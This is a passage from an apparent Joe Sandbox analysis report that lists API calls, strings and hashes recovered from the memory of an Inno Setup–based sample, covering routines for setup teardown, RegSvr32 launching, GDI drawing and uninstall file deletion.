                                                                                        • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID: ,0e$X*e$|0e
                                                                                        • API String ID: 3782394904-2478896455
                                                                                        • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                        • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                        APIs
                                                                                        • RectVisible.GDI32(?,?), ref: 00416E13
                                                                                        • SaveDC.GDI32(?), ref: 00416E27
                                                                                        • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416E65
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416EE5
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F18
                                                                                        • DeleteObject.GDI32(?), ref: 00416F22
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00416F32
                                                                                        • FrameRect.USER32(?,?,?), ref: 00416F65
                                                                                        • DeleteObject.GDI32(?), ref: 00416F6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                        • String ID:
                                                                                        • API String ID: 375863564-0
                                                                                        • Opcode ID: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                        • Instruction ID: c082a38e55a2621cff38c0036c5e412d4739722926df34ebe37a7eff5f7859fc
                                                                                        • Opcode Fuzzy Hash: c69605c35faac69eeef83e1ef2bcb629ef32bf90482d96ab6e01708da643fe70
                                                                                        • Instruction Fuzzy Hash: 70515A712086459FDB50EF69C8C4B9B77E8AF48314F15466AFD488B286C738EC81CB99
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                        • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                        • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                        APIs
                                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00422233
                                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
                                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
                                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
                                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
                                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
                                                                                        • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
                                                                                        • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                                        • String ID:
                                                                                        • API String ID: 3985193851-0
                                                                                        • Opcode ID: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction ID: 662ae76830c3dbb110fd6952920e185112f137d20e740dc0dcce1beff7d7cd05
                                                                                        • Opcode Fuzzy Hash: 794ac4a4d1563d503d4e128f610caca5ba976f2c29ed192f4e654ec8c2abe850
                                                                                        • Instruction Fuzzy Hash: AF2144703407047AE720E724CD8BF9BBBD89B04708F5451A5BA487F6D3C6F9AB804698
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(10000000), ref: 00481A11
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00481A25
                                                                                        • SendNotifyMessageA.USER32(00020478,00000496,00002710,00000000), ref: 00481A97
                                                                                        Strings
                                                                                        • DeinitializeSetup, xrefs: 0048190D
                                                                                        • Deinitializing Setup., xrefs: 00481872
                                                                                        • Restarting Windows., xrefs: 00481A72
                                                                                        • GetCustomSetupExitCode, xrefs: 004818B1
                                                                                        • Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary$MessageNotifySend
                                                                                        • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                        • API String ID: 3817813901-1884538726
                                                                                        • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                        • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                        • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                        APIs
                                                                                        • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                        • GetActiveWindow.USER32 ref: 0046172B
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                        • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                        • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                        • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                        • String ID: A
                                                                                        • API String ID: 2684663990-3554254475
                                                                                        • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                        • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                        • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                          • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                        • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                        • API String ID: 884541143-1710247218
                                                                                        • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                        • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                        • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                        • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                        • API String ID: 190572456-3516654456
                                                                                        • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                        • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                        • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                        APIs
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                        • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                        • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                        • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$StretchText
                                                                                        • String ID:
                                                                                        • API String ID: 2984075790-0
                                                                                        • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                        • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                        • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                        APIs
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDirectoryHandleSystem
                                                                                        • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                        • API String ID: 2051275411-1862435767
                                                                                        • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                        • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                        • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                        • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                        • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$Color$Draw$OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 1005981011-0
                                                                                        • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                        • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                        • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041B745
                                                                                        • GetDC.USER32(?), ref: 0041B751
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                        • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                        • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                        APIs
                                                                                        • GetFocus.USER32 ref: 0041BA17
                                                                                        • GetDC.USER32(?), ref: 0041BA23
                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                        • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                        • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                        • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                        Strings
                                                                                        • Deleting Uninstall data files., xrefs: 004964FB
